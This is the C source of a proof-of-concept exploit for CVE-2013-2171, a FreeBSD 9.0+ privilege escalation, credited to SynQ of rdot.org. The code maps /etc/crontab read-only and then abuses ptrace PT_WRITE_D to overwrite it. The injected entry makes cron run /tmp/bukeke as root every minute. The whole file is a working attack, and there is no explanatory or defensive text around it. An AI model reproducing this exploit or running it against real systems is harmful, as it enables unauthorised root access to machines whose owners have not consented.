/* 
* CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap
*
* poc by SynQ, rdot.org, 6/2013
*
* don't forget to cp /etc/crontab /tmp
*
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/types.h>

char sc[]="*\t*\t*\t*\t*\troot\t/tmp/bukeke\n#";

void child() {
  int status;

  status = ptrace(PT_TRACE_ME, 0, 0, 0);
  if (status != 0)
     printf("child ptrace error\n");
  exit(1);
}

int main() {
  int pid, fd, i;
  char *addr;

  fd = open("/etc/crontab", O_RDONLY);
  if (fd<0) {
     printf("open failed\n");
     exit(1);
  }

  addr = mmap(0, 4096, PROT_READ, MAP_SHARED, fd, 0);
  if (addr == MAP_FAILED) {
     printf("mmap fault\n");
     exit(1);
     }

  pid = fork();
  if (pid == -1) {
     printf("fork failed\n");
     exit(1);
     }
  else if (pid == 0)
     child();

  ptrace(PT_ATTACH, pid, 0, 0);
  if (wait(0) == -1) {
     printf("wait failed\n");
     exit(1);
     }
  printf("writing shellcode...\n");

  for(i=0; i < sizeof(sc)/4; i++)
     ptrace(PT_WRITE_D, pid, addr+i*4, *(int*)&sc[i*4]);

  ptrace(PT_DETACH, pid, 0, 0);
  if (wait(0) == -1) {
     printf("wait2 failed\n");
     exit(1);
     }

  printf("done.\n");
  return 0;
}